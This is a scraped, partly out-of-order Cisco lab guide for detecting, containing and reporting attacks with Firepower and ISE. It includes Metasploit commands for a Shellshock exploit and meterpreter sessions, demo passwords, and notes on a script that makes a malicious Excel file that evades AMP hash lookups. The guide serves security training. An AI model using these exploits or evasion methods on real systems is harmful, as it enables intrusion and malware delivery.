16. Optional step to perform if you wish to confirm that the MSOLE2 file was captured by FTD and sent to Dynamic Analysis. Go
to Analysis > Files > Captured Files. From the Captured File Summary window, click on Table View of Captured Files,
and confirmed that the Dynamic Analysis is completed.
Figure 62. Confirming that Dynamic Analysis took place: Captured Files
17. Next, conduct a high-level investigation of the intrusion attempt. Go to Analysis > Intrusions > Events, select Table View of
Events. From the Source IP column, click on the red computer icon for address 198.19.18.38. This will open the Host Profile.
(note that Firefox might open the Host Profile in a minimized window). From the Host Profile, select any of the magnifying
glasses of the Impact 2 Attack row.
Cisco dCloud
Figure 63. Host Profile: Select Impact 2 Attack
NOTE: We can quickly see that, this is high priority, Impact 2 Alarm (host potentially vulnerable). We see that the attack was
blocked, the attacker was the IP address of Workstation-A, a client on the inside. We also see that the victim was the IoT device,
the attack was a Bash CGI environment variable injection (aka: Bash Shellshock).
What does the IMPACT level represent? Impact scores represent a correlation between the intrusion data and the network
discovery data and the vulnerability information. It is the IPS event (Priority score), readjusted according to the context [what king
of OS is running on the target, which applications are running, etc] which is mostly discovered by Network Discovery.
Figure 64. High level Investigation
18. Note how this mirrors the attack from Scenario 1. Evil2 (though listed as simply evil on the figure below) got a foothold on
Workstation-A (198.19.18.38), which was then used as a springboard to reach 189.19.10.211.
Figure 65. Attack path: Evil -> Workstation-A -> IoT
Cisco dCloud
NOTE: This Intrusion event maps against the previous attack attempt against the IoT device. The compromised Workstation-A is
on the inside of the network (after connecting with VPN) and can be used for pivoting to other systems.
19. Let’s investigate the Security Intelligence Events of our compromised Workstation-A. From your current location at the Events
By Priority and Classification window, click on the red computer icon for 198.19.18.38. This opens, yet again, the Host
Profile page. Perform only if you are no longer at the Events By Priority and Classification window, click on Analysis >
Intrusions Events, and select Table View of Events and click on the red computer of 198.19.18.38 to open the Host Profile
20. Now, from the IoC section of the Host Profile page, click on any of the magnifying glasses on the CnC Connected row. CnC
stands for Command and Control.
21. This will open the Security Intelligence Events page, showing that our client is trying to contact a CnC server located in the
USA.
Figure 67. Security Intelligence Events
Cisco dCloud
Conclusion
This concludes the Detection/Analysis scenario. To summarize:

 We noticed a host Workstation-A, which had a few Indications of Compromise.
 We first examine the host information, which told us about the operating systems, applications etc. It also told us that the user
logged on to the host at the time of the event was Mordiac, the current CFO and a domain admin.
 Investigating the malware events showed us that Workstation-A had opened an Excel file from a server in China. This file
reputation was at first unknown by AMP and thus had to be let into the network by the firewall, while it was being checked by
dynamic analysis. At a later stage, the file was found to have a high threat score.
 The dynamic analysis of this file would also tell us of the nature of the file, that it was an Excel with several suspicious
characteristics. Complimentary analysis from Threat Grid would have shown that this was a zero-day malware, and which
would have triggered a retrospection analysis.
 We also learned that Workstation-A has attempted to attack the critical IoT device. This attack was blocked by the IPS.
 We also learned that Workstation-A is communicating with a known CnC in the USA. This traffic is blocked.
Cisco dCloud
Scenario 4. Rapid Threat Containment

In this scenario, we will show how Firepower Management Center and Cisco Identity Services Engine (ISE) can be integrated to
dCloud:
automatically quarantine a device. The FMC will use a correlation policy, which defines certain conditions and The Cisco
actions [ IF,Demo
THENCloud
],
in this case an attack from a client on a certain subnet, and tie that to a remediation: to inform ISE that the source IP address
should be quarantined.
ISE, in turn, will send a Change of Authorization (CoA) to the Network Access Devices (NAD) responsible to provide network
access to this misbehaving client. In our case, the NAD will be FTDv which is the VPN concentrator of Workstation-A.. Upon
receiving the CoA request from ISE, FTD will perform the re-authorization of the VPN endpoint. The CoA can push to the NAD, as
examples, either a new restrictive access list to be applied to the endpoint session, or a redirect to a quarantine server if the
endpoint attempt to browse. Noteworthy: The functionality of performing a Change of Authorization on a host, such as
quarantining it, can be performed by ISE regardless if the endpoint is connected via wired, wireless or VPN.
1. On FMC, navigate to Policies > Correlation. The Correlation Policy AttackfromClientPolicy2 has been preconfigured but
not yet activated. Click on the activation button to change the X into a checkmark.
Figure 68. Activating a Correlation policy
2. Next, let’s see what happens when a corporate client attempts to conduct an attack which transits through our FTD. From
Jumper, you should still have a MTPuTTY session to evil2. This SSH session should still be at the Metasploit prompt. Type
exploit to attempt another bash shellshock attack. If you don’t have a connection opened on Evil2, from Jumper’s desktop,
click on the icon mtputty, and select evil2, and type exploit. Alternatively, see note below the figure.
Figure 69. SSH session on evil2, with Metasploit in the foreground.
If you accidentally closed the Metasploit connection, and don’t wish to go through the trouble of starting another exploit, you can
instead use (a less realistic) attack by going to Workstation-A, open Firefox and click on one of the IPS Test link. This will trigger
an older type of attack, circa 2000, using cmd.exe, against an ISS command traversal vulnerability. This attack will in turn trigger
an IPS alert (sig ID 1002) for Workstation-A.
Cisco dCloud
Figure 70. Alternative attack method (less realistic) in case the metasploit connection was lost.
3. Now that the correlation rule has been activated on FMC, Workstation-A should have been put in quarantine state the
moment the exploit was detected by FTD. In our case, for quarantining, the ISE policy will redirect surfing to a remediation
server. In production, ISE would probably also push of very restrictive dynamic ACL to the Network Access Device (switch or
wlc or VPN box). Surfing to any destination, except www.cisco.com*, from Workstation-A should redirect the client to the
following quarantining server page:
.NOTE: If Firefox doesn’t redirect you to the remediation portal, use Chrome.
*Cisco.com is cached, so go to another website to test the redirection
Figure 71. Remediation Portal
Cisco dCloud
Conclusion
This concludes the fourth scenario. To summarize what has happened:

 From FMC, you activated a correlation for: If host has malicious behavior, then tell ISE to remediate/quarantine the host.
 An IPS alarm was triggered on FTD when the exploit command was issued on Evil2. The IPS alarm then triggered the
correlation rule on Firepower.
 The correlation rule on our FMC says: If IPS is triggered for Source IP = 198.19.18.0/23 then respond with Mitigation. The
mitigation action configured on our FMC, is to send a quarantine request to Cisco ISE for the offending Source IP.
 Cisco ISE is configured to react to a request of quarantining by doing, not a hard quarantine, but rather to perform a URL
redirect on a remediation portal when the offending host attempts to surf the internet.
 When Workstation-A tried to surf, it is therefore redirected to our remediation page.
Cisco dCloud
Scenario 5. Reporting
In this scenario, we will focus on the FMC Dashboards and Reporting. FMC provides rich and customizable data analysis and
reporting. In the short time available, we will only explore briefly this vast topic. dCloud: The Cisco Demo Cloud
Steps
1. From the Jumper, open Chrome and logon to FMC (https://fmc), using username: admin and password: C1sco12345.
2. Select Overview > Dashboards > Summary Dashboard 6.2.0*.
NOTE: Note that there are many different predefined dashboards (Files, Security Intelligence and many more). Each dashboard
also has different tabs (for example, Network, Threat, Intrusion Events etc).
Also, note that this Dashboard is presented under v6.3, though its name is currently misleading
3. Click the Threats tab. You may have to change the time window in the top right corner to see more meaningful data.
Figure 72. Summary Dashboards
NOTE: The dashboards can be used both as a graphical overview, for on-demand or scheduled reporting. However, they can also
be used to drill into analysis, just by clicking on any of the links in the widgets. For example, under the Connections by Security
Intelligence Category, you could click on the CnC link to show the lists of Security Intelligence Events (CnC attempts blocked due
to the known bad reputation of the destination IP address, tallied by TALOS.).
Cisco dCloud
Figure 73. CnC Link
4. You can Export/Import or create your own dashboard by selecting Overview > Dashboards > Management.
5. Click Create Dashboard.
Figure 74. Create Dashboard
6. From the Create Dashboard window, click on the down-arrow of Copy Dashboard, and select Summary Dashboard 6.2.0.
You might need to use the keyboard Down-Arrow if the drop-down menu of Copy Dashboard is unresponsive. Name your
new dashboard MyDashboard and click Create.
Cisco dCloud
Figure 75. Create Dashboard
7. On the new dashboard, click Add Widget.
Figure 76. Add Widget
Cisco dCloud
8. Click Add for the Custom Analysis widget. This very flexible widget will allow us to display data from any table with lots of
customization.
Figure 77. Custom Analysis dCloud: The Cisco Demo Cloud
9. After adding your widget, go back to your dashboard by selecting Overview > Dashboards > MyDashboard. Scroll down to
find your new widget (the title bar will say Custom Analysis).
10. Customize the new widget by first clicking top left corner, then adjusting first the Table field (as an example, pick the
correlation events, then pick which field you want to display, or any search criteria).
NOTE: It is for example easy to see which users are in quarantine, or to find out users with high number of NXdomain
responses(symptoms of CnC attempts), etc, depending on the correlation policy.
Cisco dCloud
Figure 78. Customizing a Widget
11. You can convert your customized dashboard into a Report template. Click Report Designer on the top right of Dashboard.
Figure 79. Report Designer
12. This bring you to the Report Template design, which starts with your current dashboard structure. From here, you can
modify reports, add text, logotype, change between bar, pie-charts graphs etc.
13. When you are finished, click Save and then click once on Generate, but DO NOT go yet any further. (Reports can also be
generated automatically at regular intervals.).
Cisco dCloud
Figure 80. Save Report Template
14. In the window Generate Report, make sure to select HTML output (there is no PDF reader installed on Jumper). Then, click
on the Generate button and then click Yes.
Figure 81. Select HTML Output and then Generate.
Cisco dCloud
15. View the report by going to Overview > Reporting > Reports, and click the HTML zip, which will open the report in a new
window.
Figure 82. Reviewing a manually created custom report dCloud: The Cisco Demo Cloud
16. FMC supports integrated risk reports for Malware, Attacks and Network Risks. These reports provide high-level information
aimed for upper management. Go to Overview > Reporting>Report Templates and generate an Attack Risk Report for
your review, by clicking to the booklet icon, and then clicking on the HTML blue hyperlink to see the report. Click again on the
booklet icon if you need to generate again the report.
Figure 83. Report Template – Generating a report
Cisco dCloud
Figure 84. Example Risk Report
Cisco dCloud
Conclusion
This concludes the Reporting exercise. To summarize:

 We learned how to produce and customize reports.
Cisco dCloud
Appendix – Instructor Notes

INSTRUCTORS: BEFORE PRESENTING dCloud: The Cisco Demo Cloud
Cisco dCloud strongly recommends that you perform the tasks in this document with an active session before presenting in front of
a live audience. This will allow you to become familiar with the structure of the document and content.
It may be necessary to schedule a new session after following this guide in order to reset the environment to its original
configuration.
PREPARATION IS KEY TO A SUCCESSFUL PRESENTATION.

Understanding the script that generates malware
At the beginning of each lab the script C:\Users\Mordiac\Desktop\Tools\Makemalware\make_and_copy_malware_v1 is

automatically run on Workstation-A.
This script creates a unique malicious Excel spreadsheet, not already known by AMP, thus avoiding being convicted by the initial
SHA256 lookup. If needed (if script was not run during provisioning of the lab) it can be run again manually by double-clicking this
file. This should refresh the malicious Excel that is downloaded in scenario 1.
Copy paste from PDF to PUTTY window does not work!
Some students may try to copy/paste from Lab guide PDF to the putty window instead of typing the commands. This does not
work, and the students have to type the commands manually (remind the about the tab completion available in powershell empire).
Cisco dCloud
IPS Policies not showing (“Loading Forever”)
In some version of the lab the IPS policies may not display and you will get a screen that says “loading” forever. This is because an
issue with the saved dCloud FMC virtual machine. To solve this issue follow the steps in the figure below . Create a new Policy
(2)and then cancel out of this new policy creation (3). Then select Access Control>Intrusion again (4).
Scenario 3 – Opportunity.xls and Threat Grid
The file opportunity.xls is sent to TG for analysis. Note that Threat Grid does not convict files as malicious. Threat Score reports on
the behaviour/actions of the file at one point in time.
It is fully possible to have the same file (same SHA256) to have different Threat Scores at different points in time.
Here the file gets “high threat score. But not high enough for AMP (who is informed of Threat store) to convict the file as malicious.
A reason for this is that the file is malicious in the lab environment only.
It relies on a csv file to be downloaded and executed, and this file is not available on the internet, just in dCloud lab environment.
Outside the lab (in TG environment) the files behaviour is just suspicious
Because it is trying to execute some content, but that content is never downloaded (url to content is in the lab).
This is a quite realistic attack scenario, where the attacker does not explode malware immediately (does not register the dns name
from where csv file is downloaded) until later (after sandbox has let through the file.
Rapid Threat Containment not succeeding
1. Check if there is an IPS event generated (Analysis > Intrusions). If not then double check that the generated by the
attacker is correct: route add 198.19.10.0 255.255.255.0 1 – see step in scenario 1.
2. If there is an IPS event but now quarantine, it may be because the communication between FMC and ISE has hung. This
could happen under heavy dCloud load (lots of labs sharing the same resources). Analysis > Correlation > Status
would then show an error message “Could not connect to ISE”. To solve this issue, we can restart a process on FMC. In
FMC Go to System>Integration>Identity Sources. Select user Agent then Save. Then select Identity Services Agent, and
Save.

Firepower Threat Defense Attack Lab 6.3 Guide

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Firepower Threat Defense Attack Lab 6.3 Guide

Hochgeladen von

Copyright:

Verfügbare Formate

Cisco dCloud

Cisco Firepower Threat Defense 6.3 Attack Lab

About This Lab

 Scenario 5: Reporting—analyze and customize sample reports.

The Lab Guide includes the following sections:

 Renewed certificates of lab components (FMC, ISE, FTD, ASA, Workstations).

About This Solution

The lab does not assume any prior training on Firepower.

Figure 1. dCloud Topology

Figure 2. Lab Topology

dCloud: The Cisco Demo Cloud

Systems in this lab

 FMC will be accessed via Jumper using Chrome.

Table 2. Preconfigured User Information

Device User ID Password

Workstation-A 198.18.133.38 DCLOUD\mordiac C1sco12345

FMC public IP 198.18.133.10 admin C1sco12345

dCloud: The Cisco Demo Cloud

 Jumper: 198.18.133.135, Username: cisco, Password: C1sco12345

Figure 3. Accessing Workstation-A form Jumper.

dCloud: The Cisco Demo Cloud

Figure 4. Successful connectivity to IoT

Figure 5. MTPuTTY Configurations for evil2

dCloud: The Cisco Demo Cloud

Scenario 1. The Attack

Figure 6. nmap scan against IoT device.

Starting Nmap 7.50 ( https://nmap.org ) at 2018-06-24 03:13 EDT

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds

5. The following screen output displays.

Figure 7. Starting Metasploit

dCloud: The Cisco Demo Cloud

Figure 8. Check that AnyConnect is connected.

dCloud: The Cisco Demo Cloud

7. On Workstation-A, open Firefox. The homepage should open as follow:

dCloud: The Cisco Demo Cloud

dCloud: The Cisco Demo Cloud

Figure 11. Excel file, opportunity.xls, infected with a zero-day malware

dCloud: The Cisco Demo Cloud

12. Save the file to the Desktop of Workstation-A.

Figure 12. Enable Editing in Excel

dCloud: The Cisco Demo Cloud

Figure 13. Enable Content in Excel

Figure 14. Metasploit receives a session from the compromised client.

dCloud: The Cisco Demo Cloud

msf exploit(multi/handler) > sessions -i

Id Name Type Information Connection

msf exploit(multi/handler) >

msf exploit(multi/handler) > sessions -i 1

meterpreter > pwd

Mode Size Type Last modified Name

Figure 15. Help command output

dCloud: The Cisco Demo Cloud

Figure 16. Sending meterpreter to the background of Metasploit

resource (iot.rc)> set rhost 198.19.10.211

24. Run the exploit.

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

Figure 18. Run the Exploit

This concludes the first scenario. To summarize what has happened:

This is now a race against time.

Scenario 2. Getting Familiarized with Firepower Management Center

Figure 19. TALOS might be unreachable from the dCloud environment

Figure 20. Adjust Time period for Content Explorer

dCloud: The Cisco Demo Cloud